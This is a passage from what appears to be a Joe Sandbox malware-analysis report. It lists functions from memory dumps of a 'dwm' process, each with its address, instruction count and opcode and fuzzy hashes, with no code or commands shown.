                                                              • Instruction Fuzzy Hash: 28E09230B1A7854FC70AAA3888695607BB1EF6720278952FFC445CB1A3DA28DC89C741
                                                              Function 00007FFD9B798299 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4c1fdbd151cec6eb495ed770596f0ce42c64b3a060d1fff0f6b0bd1a1324ef99
                                                              • Instruction ID: 945485279bb72fa1b08e55cc13fd5213d91b815dc98145e9d484f295657ee3c6
                                                              • Opcode Fuzzy Hash: 4c1fdbd151cec6eb495ed770596f0ce42c64b3a060d1fff0f6b0bd1a1324ef99
                                                              • Instruction Fuzzy Hash: F9E04F30A197844FC70AAB28886A9503BB0EF6B21178A40EFD449CB1B3D629DC48C712
                                                              Function 00007FFD9B764B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e91f4addccb7e7aedda89edbb4bb039b6a935c00b24033934305c43e57ec5e95
                                                              • Instruction ID: d247a3feb1871f83e2502e3a563635804e505cb7217e384cb12b3300f1bb7974
                                                              • Opcode Fuzzy Hash: e91f4addccb7e7aedda89edbb4bb039b6a935c00b24033934305c43e57ec5e95
                                                              • Instruction Fuzzy Hash: 1DE0D867F0EA0D8EF2A4D55804383BC21C1EF68710F0603BAD00EC22B2ED181D414642
                                                              Function 00007FFD9B79D7E9 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6f63c93239c0264503634fc0cc106ff43caa8969635b0bec446b1b2b4118177
                                                              • Instruction ID: f66ac2908704c89e49639b143ed33abea5ae64208aaaa59c0ad4a52d7f04a7cf
                                                              • Opcode Fuzzy Hash: c6f63c93239c0264503634fc0cc106ff43caa8969635b0bec446b1b2b4118177
                                                              • Instruction Fuzzy Hash: 75E08631A497804FC70A5A2488A98543BB0EF6B11278A40FBC005CF2B3DA2DDC89C751
                                                              Function 00007FFD9B775380 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: 12906f6fa95177497d5ecbaec1be252edbea940ecbdbc9dfecc245f5e8fc43d0
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: FCD05E30B60A0D4B8B0CA62D8458430B3D2E7AA2067D45278940BC6291ED25ECC68B80
                                                              Function 00007FFD9B7759C0 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b770000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction ID: c61fe5340826535afc364edbb8319161b8aa29362d4cd5ec83c615b501475cb2
                                                              • Opcode Fuzzy Hash: 5c9aaf220aafc8575021d81a2c6305aca19865762ec049976cbd88cd29237e24
                                                              • Instruction Fuzzy Hash: 1CD05E30B60A0D4B8B0CA62D8858430B3D1F7AA20A7A45278940BC6295ED25ECC68B81
                                                              Function 00007FFD9B79A670 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B79A5E0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B763276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: eac9f3c9e8164cb1cf41174d48b875757e4d30de8a0aeb40b766ac3de036df50
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: 34E0ED30B0D61E8AFBA49144C8647A97255EBA4300F1511B8D58EA33F1DD78AF848A46
                                                              Function 00007FFD9B799059 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e18066d6c0c5d5fdbddcf141f4746e22061304b2f5e423c42712523e325f5cf
                                                              • Instruction ID: c7d72724683bd5e026c53f6dbc6db57b17308231de1821026fe09fe2422fd9ac
                                                              • Opcode Fuzzy Hash: 0e18066d6c0c5d5fdbddcf141f4746e22061304b2f5e423c42712523e325f5cf
                                                              • Instruction Fuzzy Hash: 35E0173150A7884FC70BAB3488A99803FB0EE6B21578B01C7D045CF5B3EA1A8D89C762
                                                              Function 00007FFD9B797A09 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45f23fc92541fa3ed755ba684f60001b09e1078abf6d73c0a2eb0536067f48cc
                                                              • Instruction ID: 246205a5add23fd25976c292356efa1ea58a3354e144bf98649bf245e8bab5c7
                                                              • Opcode Fuzzy Hash: 45f23fc92541fa3ed755ba684f60001b09e1078abf6d73c0a2eb0536067f48cc
                                                              • Instruction Fuzzy Hash: E3E01A21A4F7C04FC74B973488688407F61DE5721074A45EAC085CF5B3D6199949C701
                                                              Function 00007FFD9B79D869 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                              • Instruction ID: 0ec8cf901b06bb288d1d8f67f6948a7a9c0b4ce16eca596bc6732798b7e6f6fe
                                                              • Opcode Fuzzy Hash: 5dca4974807c69a72bb291b6a7fa4e74e6263f6fbdbfe6379304d645b69b7791
                                                              • Instruction Fuzzy Hash: BCE04F7194F7C04FC70B973588B88507FA0EE2721078A45EEC085CF1F3E6198849C701
                                                              Function 00007FFD9B79CF79 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4af934e069c0a228b869cc59da5ac456c0c4f02cf755ba926c70f7b65ed04220
                                                              • Instruction ID: 8a365ed14ec2f7f94cfbf50f45c2ff968a7aec04b37f2d32102940b7d6256faf
                                                              • Opcode Fuzzy Hash: 4af934e069c0a228b869cc59da5ac456c0c4f02cf755ba926c70f7b65ed04220
                                                              • Instruction Fuzzy Hash: 82E0EC3050A7844FC70A9B2488A99543FB0EF2621178A01EBC449CF5B3D6199888C752
                                                              Function 00007FFD9B791DF0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Function 00007FFD9B79B958 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: fe5d2e2e78bdc423bb53829c1512d3d9b146ac1e48e140a0f8f64f19e76b516e
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: 35D01234B619044FC71CA63CC859CB473E1EB6A216B9541A9D00AD72B2D96ADD89C741
                                                              Function 00007FFD9B797070 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: caa9557b7c8fbbf9220238cbe71cdab5a5e336f9a49de818bd8e418ca5e417a5
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 3BD02230B649040FC70CA63C88588307390EB6A20278100A8D00BC72B1EA2ADD88C740
                                                              Function 00007FFD9B792608 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b791000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f40ab163efaee8748fc0d8f72d7b783e139fcc02fccfffc09f0f38b774d2444f
                                                              • Instruction ID: 467879ced7d9a4e540e44813df3608135ecfe91a9c0f0d4f177cf972c0e7fdac
                                                              • Opcode Fuzzy Hash: f40ab163efaee8748fc0d8f72d7b783e139fcc02fccfffc09f0f38b774d2444f
                                                              • Instruction Fuzzy Hash: 5FD05E25B0E68A4AE768FA9888717B97691BB54300F0501B4F40D83AE7D85878508282
                                                              Function 00007FFD9B760B9D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 4fdbc536c79722502b53c9ad39bec016a64a1a59702f9d50975155a0f0f68b42
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: 93C0123062990E8FDA40BB29C989824BBA0FB0E201BDA01E0E00CC71B1D629A8908701
                                                              Function 00007FFD9B7606AD Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: 9e2b7c4e750e7f02da47408f58e3c342e497522114e2d06050a3261e0b4a4730
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: CCC08C00F1FB4F88E43631EE14A20BCB6008BD4A24FE30732D00E401B99C8E22D50147
                                                              Function 00007FFD9B7612B8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 9976457592a5567f15df95d6e84c13dd9153ca036e6dfc3c2b6f3f5d6577c783
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: EFC08C3061180C8FC908EF28C88480433A0FB19200BC200A0E00AC7170D219DCC0C741
                                                              Function 00007FFD9B7654F9 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5afc9fd6629c0cc75c4f11ac7fef234246f1b784cac732319d247f5291437ab2
                                                              • Instruction ID: a68215419acb9178af1ce9b380eae75e7f47ac0c5b406034c022860045a47e6b
                                                              • Opcode Fuzzy Hash: 5afc9fd6629c0cc75c4f11ac7fef234246f1b784cac732319d247f5291437ab2
                                                              • Instruction Fuzzy Hash: 7CC08C00F18C1E4AF21A2B18083023D04424B80304F8940B0F40FC37EECD1D5F0202C7
                                                              Function 00007FFD9B7606D0 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 4efdaeeb550b55bef5205a8d62a8f13d4c664f85f20e10e01257bebe560b57bd
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 63B01200D6BA4F44E42931FB089307478409B85104FD20270E40C402B5988D12A40243

                                                              Non-executed Functions

                                                              Function 00007FFD9B7609B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.2329669667.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ffd9b760000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: afeb4298dac98fdff4fb6caaf071b3a459c5ef4a6435f4854e55e839c8882659
                                                              • Instruction ID: 78ac5625fa643a92ff6e59a2daafa44c14ba8fc2f8b15b830db769ea0a7f4bcc
                                                              • Opcode Fuzzy Hash: afeb4298dac98fdff4fb6caaf071b3a459c5ef4a6435f4854e55e839c8882659
                                                              • Instruction Fuzzy Hash: 3251EC0FB9C5274DE31932FD71619FC6B469FA0279B0846B7F15EC90DB8E0824868AE5

                                                              Executed Functions

                                                              Function 00007FFD9B7B1175 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: I
                                                              • API String ID: 0-3707901625
                                                              • Opcode ID: 74c2e93c121286dafa0e013d71afe7710570da61124fe57877f2c9423a6dedcc
                                                              • Instruction ID: 5f0a5463137b04833abb70cfdcb5e3bcb497fdcf928ab941134aeba8f93aeca9
                                                              • Opcode Fuzzy Hash: 74c2e93c121286dafa0e013d71afe7710570da61124fe57877f2c9423a6dedcc
                                                              • Instruction Fuzzy Hash: 65819F61F7E76A0BE33C49684CA20717795EBD2205B1A837DD8DBC35A7DC18AD074A81
                                                              Function 00007FFD9B780D48 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5Y_H
                                                              • API String ID: 0-3237497481
                                                              • Opcode ID: 21b3b5c9a3a0997a9b8be6a4b8c8f6fbd4f5a837a536c3ee1b57ee9482c02f63
                                                              • Instruction ID: 1654293934736e723337cbbabd028be2a09d42febc8b6c9b067675c83bd9188e
                                                              • Opcode Fuzzy Hash: 21b3b5c9a3a0997a9b8be6a4b8c8f6fbd4f5a837a536c3ee1b57ee9482c02f63
                                                              • Instruction Fuzzy Hash: E891F4B5A19A8D8FDB99DF6C8C657A97FE1FB56310F0002BBD04AC72E6DE7818018750
                                                              Function 00007FFD9B7B1141 Relevance: .5, Instructions: 459COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b7b1000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9deae7c68d04954cbb6c116e62435af680783e17eb6c3bf0cb9d3fb1658a450
                                                              • Instruction ID: d4264769e08b78dafd2cda464f0ced1910a67da7cdb576196656e2e2fb75c50a
                                                              • Opcode Fuzzy Hash: d9deae7c68d04954cbb6c116e62435af680783e17eb6c3bf0cb9d3fb1658a450
                                                              • Instruction Fuzzy Hash: 52C1B321B3E7AE0FE32D4A684C910B57791EF92305B1987BDD4DBC35B7D828A9074A81
                                                              Function 00007FFD9B780C25 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 277200e26e409dae68cdc82f55e0a1f068c4e42409205f337b3da2c35845ed17
                                                              • Instruction ID: 8a0abbc85fd62016e1e7d7a194364c0183c22cdbff141ad08c6d697179f6b4a2
                                                              • Opcode Fuzzy Hash: 277200e26e409dae68cdc82f55e0a1f068c4e42409205f337b3da2c35845ed17
                                                              • Instruction Fuzzy Hash: FC21D126A0DB8D8FE7129B6488611E87BA0EF42325F0542F7C0548B1E2D638260ACB91
                                                              Function 00007FFD9B780C38 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 520a81ca70cafffcc94859bf87e1673d9ed667531c068c5f64aed3fa6216f359
                                                              • Instruction ID: 90b8e4a0e07ed3ca5dac72c8e3e345520d6ed687c8cccce9a03c48bd16e0b895
                                                              • Opcode Fuzzy Hash: 520a81ca70cafffcc94859bf87e1673d9ed667531c068c5f64aed3fa6216f359
                                                              • Instruction Fuzzy Hash: BD11A025A0DB8D8FE702DB74C8602E87FA0EF42315F0646F7C084DB1E2DA3826098B91
                                                              Function 00007FFD9B780C40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 61635438aed1f1c3a4a9c9fc20a10f855f5c4fae1573f7791d906154e79172b6
                                                              • Instruction ID: ab1fd3a35968fd68e9ccafc6205c14f021a5478a70445569ac0c8c460d8a6ed9
                                                              • Opcode Fuzzy Hash: 61635438aed1f1c3a4a9c9fc20a10f855f5c4fae1573f7791d906154e79172b6
                                                              • Instruction Fuzzy Hash: F801A135A09B8D8FE702DB74C8606D97FB0AF02315F0546F7C480DB1A6D6382648CB91
                                                              Function 00007FFD9B780C48 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: d29e90e0689a99c8b78eedfe00202515bca0e764302219d4e39f5f2cf586c990
                                                              • Instruction ID: b0dceba582e9f25a0a82454677c46eeea92f871f24e0866e82e13419813222a9
                                                              • Opcode Fuzzy Hash: d29e90e0689a99c8b78eedfe00202515bca0e764302219d4e39f5f2cf586c990
                                                              • Instruction Fuzzy Hash: 7E01B135A0D7898FD702DB74C8506DD7FB0AF02315F0541E7D480DB2A6D6386648CB91
                                                              Function 00007FFD9B780C50 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_7ffd9b780000_dwm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: bd8b6f51305df0b5143f89dee9c9b3da75dc93b31064bdf85609f089ae850942
                                                              • Instruction ID: f14c0fed0f9c0cd8875da9d223a1fdad7a7907e0214d60845dae78e53bd7e652
                                                              • Opcode Fuzzy Hash: bd8b6f51305df0b5143f89dee9c9b3da75dc93b31064bdf85609f089ae850942
                                                              • Instruction Fuzzy Hash: 1C01A234A0D7898FD702DB74C8A46DD7FF0AF02315F1542E7D480CB2A6DA386648C741
                                                              Function 00007FFD9B7B2FB9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.2318961476.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
